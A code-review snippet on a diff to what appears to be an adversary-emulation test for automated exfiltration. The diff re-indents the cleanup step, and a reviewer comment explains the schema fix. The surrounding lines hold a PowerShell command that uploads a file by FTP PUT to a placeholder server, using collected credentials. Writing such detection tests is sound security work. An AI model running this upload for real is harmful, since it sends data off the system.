atomics/T1020/T1020.yaml

```diff
@@ -57,5 +57,5 @@ atomic_tests:
       $ftpUrl = "#{ftpServer}"
       $creds = Get-Credential -Credential "#{credentials}"
       Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
-  cleanup_command: |
-    Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
+    cleanup_command: |
+      Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
```

Comment:
`cleanup_command` was in the root. Moving it under `executor` based on the schema